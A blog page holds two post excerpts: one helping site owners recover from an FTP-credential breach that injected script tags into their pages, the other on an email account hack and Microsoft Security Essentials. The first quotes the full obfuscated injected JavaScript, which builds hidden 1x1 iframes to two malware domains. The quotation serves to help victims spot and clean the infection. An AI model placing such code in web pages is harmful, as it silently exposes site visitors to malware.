Sean Walther's Blog

Help: Site Hacked with script Tags

If you found your server hacked in the past few days (maybe through a browser alert in Chrome) with the following code:

<script>ti=’.c’;ai=’af’;qo=’p';jn=’htm’;rf=’n';tf=’doz’;yn=’ifr’;xm=’s';cl=’o';jd=’k9′; nn=’tv.’;rl=’85y’;r=’umu’;eh=’m/’;ec=’htt’;sb=’rc’;f=’ame’;l=’://’;b=yn.concat(f); gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute(‘width’,’1′);xp.setAttribute(‘height’,’1′); xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);</script><script>wa=’t';p=’ht’;f=’k98′;tb=’ame’;bg=’.';v=’sr’;g=’tp:’;vf=’/z’;bs=’t';px=’v.h’; br=’yt’;k=’c';yr=’m';ds=’m';ej=’/';au=’/';t=’com’;sp=’ifr’;r=’ca’;cp=’y';wz=’ir’; wf=’u';b=’5′;se=sp.concat(tb);oz=v.concat(k); db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute(‘width’,’1′);ip.setAttribute(‘height’,’1′); ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);</script>

Then you should know it is likely a breach of your FTP password.

You will find that code inserts iframes that spread the malware, linking to the following sites (do not go there):

• http:|| numudozaf . com
• http:|| zirycatum . com

First, you need to figure out which machine caused the breach.  Some computer(s) with FTP information stored was breached.  If you give that computer a new FTP account, it will just get hacked again.

Based on some reports online, it is likely that every FTP site you have access to was compromised (if you were the source of the compromise).  You should request logs from your web host, to identify which user caused the problem.

› Continue reading

Tags: Ad-Aware, FTP, Hack, index.php, Microsoft Security Essentials, numudozaf, zirycatum

Computer Security: Microsoft Security Essentials

I’m not always the biggest fan of Microsoft, but I have to admit they have a large reach and significant resources.

Recently a friend of mine mentioned his MSN account got hacked, and that it was a vulnerability in “some Microsoft software”.

It’s scary just how much your email account controls nowadays.  In my friend’s example, his credit cards were manipulated, his facebook account stolen, his email was hijacked (duh), and many of his other accounts linked to that email were stolen.  Our email account is used to validate bank accounts (occasionally, although many other means of security are used), many of our “social” accounts, medical records, credit cards, and almost everything we do.

Microsoft recently suggested that he install their recent piece of security software to prevent this …

What can you do to protected yourself, for free?

› Continue reading

Tags: Defender, Hack, Microsoft, Microsoft Security Essentials, MSN